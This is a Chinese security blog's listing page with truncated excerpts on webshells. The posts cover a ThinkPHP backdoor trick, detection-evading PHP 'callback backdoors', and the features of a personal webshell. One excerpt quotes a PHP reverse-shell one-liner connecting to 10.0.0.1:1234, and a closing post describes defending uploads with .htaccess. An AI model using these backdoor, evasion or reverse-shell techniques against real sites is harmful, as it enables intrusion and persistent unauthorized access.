ThinkPHP留后门技巧

作者: 分类: 网络安全 时间: 2015-10-15 0:34 评论: 5条评论 浏览: 4362人看过 标签: webshell thinkphp 回调后门

    90sec上有人问,我说了还有小白不会用。去年我审计TP的时候留意到的,干脆分析一下代码和操作过程。

    thinkphp的I函数,是其处理输入的函数,一般用法为I('get.id')——从$_GET数组中取出键为id的值,post、cookie类似。

    let me see see I函数的代码:

function I($name, $default = '', $filter = null, $datas = null)
{
    ...

    if ('' == $name) {
        // 获取全部变量
        $data    = $input;
        $filters = isset($filter) ? $filter : C('DEFAULT_FILTER');
        if ($filters) {
            if (is_string($filters)) {
       ...

阅读全文>>

创造tips的秘籍——PHP回调后门

作者: 分类: 网络安全 时间: 2015-6-22 1:46 评论: 5条评论 浏览: 7140人看过 标签: webshell WAF绕过 回调后门

    最近很多人分享一些过狗过盾的一句话,但无非是用各种方法去构造一些动态函数,比如$_GET['func']($_REQUEST['pass'])之类的方法。万变不离其宗,但这种方法,虽然狗盾可能看不出来,但人肉眼其实很容易发现这类后门的。

    那么,我就分享一下,一些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。

0x00 前言

    有很多朋友喜欢收藏一些tips,包括我也收藏了好多tips,有时候在渗透和漏洞挖掘过程中很有用处。

    一句话的tips相信很多朋友也收集过好多,过狗一句话之类的。14年11月好像在微博上也火过一个一句话,当时也记印象笔记里了:

    QQ20150619-2@2x.png

    最近又看到有人在发这个:http://www.secoff.net/archives/436.html

    有同学收集tips,就有同学创造tips。那么我们怎么来创造一些过狗、过D盾、无动态函数、无危险函数(无特征)的一句话(后门)?

    根据上面这个pdo的一句话,我就可以得到一个很具有普适性的结论:php中包含回调函数参数的函数,具有做后门的潜质。

    我就自己给这类webshell起了个名字:回调后门


阅读全文>>

个人版php webshell的一些功能

作者: 分类: PHP 时间: 2014-10-28 23:03 评论: 6条评论 浏览: 4151人看过 标签: webshell php

    网上的webshell总结起来有一些缺陷:

    1.兼容性差,当某函数禁用后,该功能就不能用了。其实php是个很灵活的语言,很多功能是可以有很多实现方式的。

    2.功能单一,一般都只有常用的几个功能,不够好用。

    3.突破性不强,没用利用一些php、IIS、apache、nginx的CVE来达到一些特殊目的,比如绕过open_basedir、绕过安全模式等。

    4.别人写的自己不了解,维护起来不方便,免杀起来也不顺手。

    特别是第一点,和第二点,我想自己的webshell能够有更好的使用效果。webshell已经写了一半,除了常见功能。大概、我希望有如下一些比较好的:

    1.执行命令,囊括尽可能多的方法,和一些奇技淫巧

    2.获得内网IP,并能扫描内网端口

    3.利用...

阅读全文>>

php webshell下直接反弹shell(不借助任何其他语言)

作者: 分类: PHP 时间: 2014-10-27 18:43 评论: 2条评论 浏览: 5138人看过 标签: webshell 反弹shell

    linux下,有时候拿到webshell需要提权,提权必须要得到一个交互式的shell。

    我看了一下常用的php webshell,对于命令执行、反弹shell都没有完善的方式。很多webshell里都没有proc_popen、popen这两种方式,特别是proc_popen,比如phpspy。

    在我收集的反弹shell集合(http://tool.p1ng.pw/getshell.html)中,有一个方法,就是在命令行中输入:

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
    但是有个问题,如果在webshell里执行如上代码的话,会把系统的标准输入输出重定向到/bin/sh里,导致php-fpm直接502,然后弹的shell也会瞬间掉了,这个方式比较粗鲁。而我的思路是:我只希望把我新创建的进程(/b...


阅读全文>>

webshell,禁止你执行

作者: 分类: 网络安全 时间: 2013-2-21 2:29 评论: 4条评论 浏览: 22805人看过 标签: htaccess webshell 阻止脚本运行

    做了那么多渗透测试,关于拿webshell的方法算是知道了不少。现在回过头看看自己的站,是不是也要增加点防御措施呢?实话说,如果有emlog后台的话传webshell应该不成问题,保护后台最简单的方法就是设置一个复杂的密码,md5破解不了黑客也束手无策。

    其实最危险的地方是我们自己,像我这种爱折腾的人喜欢在网站上传一些不同人写的程序,比如图床,...

阅读全文>>

Top ↑ sitemap More